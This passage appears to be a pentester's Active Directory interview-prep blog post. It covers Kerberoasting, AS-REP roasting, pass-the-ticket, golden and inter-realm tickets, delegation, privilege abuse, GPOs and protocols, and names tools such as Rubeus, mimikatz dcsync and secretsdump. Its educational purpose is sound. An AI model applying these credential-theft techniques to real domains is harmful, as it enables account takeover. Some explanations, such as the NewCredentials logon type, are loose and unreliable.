For this attack we can use impacket GetUserSPNs.py script, the Rubeus kerberoast command, or the Invoke-Kerberoast.ps1 script
What is ASREProasting?
Asreproasting tool from the goat: https://github.com/Yaxxine7/ASRepCatcher/
When Kerberos pre-authentication is disabled, anyone can impersonate those accounts by sending a AS-REQ message, and an AS-REP response will be returned from the KDC
We could use tools such as impacket GetNPUsers.py script, the Rubeus asreproast command or the ASREPRoast.ps1 script then crack the hash locally
Explain Pass the Key/Over Pass the Hash.
Over Pass The Hash / Pass The Key (HackTricks)
To request a TGT we don’t need a password but a Kerberos key, if we can steal a key we can request a TGT as the user.
What is Pass the Ticket?
The Pass the Ticket technique consists on steal a ticket and the associated session key and use them to impersonate the user in order to access to resources or services.
What are Golden/Silver tickets?
In Active Directory, the Kerberos TGTs are encrypted with the krbtgt
account keys. In case of knowing the keys, custom TGTs, known as Golden Tickets, can be created.
To get the krbtgt
keys, you need to access to the Active Directory database. You can do this by performing a remote dcsync attack, with mimikatz lsadump::dsync command or the impacket secretsdump.py script, or by dumping the NTDS.dit file locally with ntdsutil or vssadmin.
Golden Ticket Attacks (GitBook)
How does kerberos work with services accross domains?
A KDC (DC) only can issue STs for the services in its domain. So accros domains we have to ask for a ST to the external domain DC, and for that we require a TGT for that server. The TGT for an external KDC, known as inter-realm TGT, is issued by our KDC when we ask for a ST for a service in another domain.
here is the schema:
1 | KDC foo.com KDC bar.com |
Can you tell me more about Inter-realm TGTs?
Forest Privilege Escalation - Domain Trusts (HackTricks)
This TGT is exactly like a normal one, except that it is encrypted with the inter-realm trust key, which is a secret key that allows to both sides of a trust to comunicate between them.
You can get the inter-realm trust key, you just need to dump the domain database.
Finally, once you get the trust key, to create a inter-realm ticket, you can use the mimikatz kerberos::golden command or the impacket ticketer.py script. Then you can use it as any ticket.
Kerberos Delegation
Can you explain kerberos delegation?
Let’s say we are a user on a website. When we make a request the webserver goes and fetch the document we’re looking for but how does it know what we own on the file server. The delegation will make it possible for the web server to “impersonate” the user and athenticate as the user to go and fetch the ressources. The file server will think that it’s the user that directly made the request:
What’s the difference between Contstrained and Unconstrained Delegation?
In Kerberos Unconstrained Delegation the service can impersonate the client user since this sends its own TGT to the service. Then, the service can use the user TGT (without any constrain) to ask for new STs for other services in behalf of the client.
To create a more secure way of delegation, Microsoft develop two Kerberos extensions known as Service for User (S4U). By using these extensions, services can be restricted to only perform delegation against a set of allowed third-services, and no user TGT is required, preventing it from being stored on the service server. This is known as constrained delegation.
Logon types
Explain why there are different logon types.
In order to logon users, both locally and remotely, Windows defines different types of logons. It’s good to know not every logons can be used by any user and many logons cache credentials in the lsass process , or even in the LSA secrets. That can be interestin as a pentester to recover that.
Can you explain the different logon types?
- Interactive Logon: An interactive logon occurs when a user logs on to a system or network using a username and password, usually through a graphical user interface (GUI) or command-line interface (CLI). This type of logon allows the user to interact with the system, access files, and perform tasks.
- Network Logon: A network logon is a type of logon that occurs when a system or device connects to a network using a username and password. This type of logon allows the system or device to access network resources, such as shared folders, printers, or internet connectivity.
- Batch Logon: A batch logon is a type of logon that occurs when a program or script runs on a system using a username and password. This type of logon is often used for automated tasks, such as batch processing, data backups, or system maintenance.
- Service Logon: A service logon is a type of logon that occurs when a system service or daemon starts up and runs under a specific username and password. This type of logon allows the service to perform its intended function, such as providing network services, managing system resources, or running background processes.
- NetworkCleartext Logon: A NetworkCleartext logon is a type of logon that occurs when a system or device connects to a network using a username and password in plain text. This type of logon is considered insecure as it transmits sensitive information, such as passwords, in an unencrypted format.
- NewCredentials Logon: A NewCredentials logon is a type of logon that occurs when a user logs on to a system or network using a new set of credentials, such as a new username and password. This type of logon is often used for authentication and authorization purposes, such as when a user changes their password or when a new user is added to a system.
- RemoteInteractive Logon: A RemoteInteractive logon is a type of logon that occurs when a user logs on to a system or network remotely using a username and password, often through a remote desktop protocol (RDP) or virtual private network (VPN). This type of logon allows the user to interact with the system as if they were physically present at the system.
Authorization
We are now athenticated on the domain. Now technically the domain, service or programs must be aware of our permissions and can decide thanks to those if we can have access to certain objects ->
What are security descriptors?
Security descriptors are associated to each object in the Active Directory. It’s checked when we have to verify if a user has access to a certain object of the Active Directory. It is stored in a binary format, but it can also be translated to a Security Descriptor String Format.
What is the difference between ACLs and ACEs?
ACLs, DACLs, SACLs, ACEs (HackTricks)
- ACLs (Access Control Lists): These are lists that specify the permissions granted or denied to different users and groups for a particular object. They define who can access the object and what actions they can perform.
- ACEs (Access Control Entries): These are individual entries within an ACL. Each ACE defines the permissions for a specific user or group. Multiple ACEs make up the ACL for an object.
ACLs provide the overall permission structure for an object, and ACEs define the specific permissions for each user or group within that structure.
Privileges
What are some dangers of misconfigured privileges?
In AD, some privileges can be also abused and lead to malicious actions like the SeBackupPrivilege that allows to read any file of a domain controller, in order to backup it, which could be used to read the domain database.
SeDebugPrivilege which allows to debug any process in the machine, so we could inject code in any process, which could lead to privilege escalation or SeRestorePrivilege that allows to write any file on the domain controller from a backup. This could allow an attacker to modify the database of the domain.
Here is an interesting article with POCs about privilege abuse: https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt
Group Policy
What are Group policies?
The Group Policy is a mechanism that allows to apply a set of rules/actions to the Active Directory network users and computers. In order to define the rules, you can create Group Policy Objects (GPOs). Each GPO defines a series of policies that can be applied to specific machines of the domains.
What are some actions you can make through Group policies?
- Disable NTLM
- Require password complexity
- Execute an scheduled or immediate task
- Create local users in computers
- Set a default wallpaper
- Synchronize files with OneDrive
Communication Protocols
What do you know about SMB?
SMB (Server Message Block) is a protocol used to share files and communicate between machines on port 445
From a pentester POV it’s an interesting protocol since shares can contain valuable informations.
Shares are like folders that a machine shares in order to be accessed by other computers/users in the network.
What do you know about HTTP in an active directory context?
HTTP is the protocol of the web.
It is used as transport protocol by many other application protocols that are present in a Active Directory domain like WinRM (and thus Powershell Remoting), RPC or ADWS (Active Directory Web Services).
HTTP supports authentication with both NTLM and Kerberos. This is important from a security perspective since it implies that HTTP connections are susceptible of suffering from Kerberos Delegation or NTLM Relay attacks.
What can you say about RPC?
Remote Procedure Call (RPC) is a protocol used in Active Directory (AD) for communication between client and server systems, as well as between different services within the AD infrastructure. RPC allows a program on one computer to execute code on a remote system, facilitating various functions and services essential to AD operations.
What can you say about WinRM
Windows Remote Management (WinRM) is a protocol used for remote management of Windows-based systems, including those within an Active Directory (AD) environment. WinRM is based on the Web Services-Management (WS-Man) protocol, which provides a standard way for systems to interact with each other over a network.
WinRM enables administrators to perform remote management tasks, such as running scripts, accessing event logs, and managing services on remote systems within an AD domain.
What can you say about SSH?
SSH (Secure Shell) is a protocol used for accessing and managing Unix systems like Linux. Even if it is not related with Active Directory directly, usually many Linux machines deployed in a domain could be accessed through SSH. It allows the user get a shell on a remote system, transfer files (with the scp utility) and establishing SSH tunnels.
What are 3 types of port forwarding with SSH?
Local Port Forwarding
- The goal of local port forwarding is ccessing a service running on a remote server as if it were running locally. Imagine you want to access a web server running on
remote_host
‘s port 80 through your local port 8080. After performing the port forwarding, accessinghttp://localhost:8080
in your browser would connect toremote_host
‘s web server.
Remote Port Forwarding
- The goal of remote port forwarding is to Redirect a remote port to a local destination and allowing access to a local service from a remote server. Imagine You want a remote user to access a web server running on your local machine’s port 8080. After executing the command, accessing
http://ssh_server:8080
would connect to your local machine’s web server.
Dynamic Port Forwarding
- The goal of Dynamic port forwarding is to Create a SOCKS proxy that routes multiple connections through an SSH tunnel. The goal is to securely tunnel traffic from various applications through a single SSH connection. Imagine You want to route your web traffic through an SSH server to browse securely. After executing the command, configuring your web browser to use
localhost:8080
as a SOCKS proxy will route its traffic through the SSH server.
For now, it is all. More will be added soon after OSCP, stay tuned.